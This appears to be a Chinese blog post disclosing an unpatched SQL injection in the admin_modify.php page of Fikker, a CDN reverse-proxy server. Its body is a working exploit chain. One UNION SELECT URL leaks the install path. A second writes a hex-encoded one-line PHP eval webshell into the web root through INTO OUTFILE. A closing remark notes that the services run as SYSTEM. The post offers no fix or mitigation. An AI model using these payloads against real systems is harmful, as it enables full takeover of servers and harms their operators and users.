Fikker 是一款面向 CDN/站长 的专业级网站缓存(Webcache)和反向代理服务器软件(Reversed Proxy Server)。近日在一起安全事件中发现fikker主控多个php文件存在高危注入漏洞,可获取Webshell to System.

目前官方尚未修復该漏洞。

漏洞级別:严重

影响版本:所有

爆目录

admin_modify.php?id=-1%20union%20select%201,@@basedir,3,4,5,6,7,8,9,10,11,12,13

写一句话(目录如果改了,可以通过下面的语句加些/这些让PHP报错)

admin_modify.php?id=1%20and%201=2%20union%20select%200x3C3F70687020406576616C28245F504F53545B27636D64275D293B3F3E,0x3c3f2f2a,3,4,5,6,7,0x2a2f3f3e,9,10,11,12,13%20into%20outfile%20%27d:/FikkerCDN/webroot/fikcdn/admin/test.php%27

后记:

如果仅仅是注入,也是最多爆爆库啥的,进进后台改改数据之类。但是由於开发人员缺乏安全意识,主控依赖的Apache,MySql等,都是以System权限在Windows 上运行,这意味著只要有注入就可以导出WebShell,只要有Webshell就有System.

标签: none

添加新评论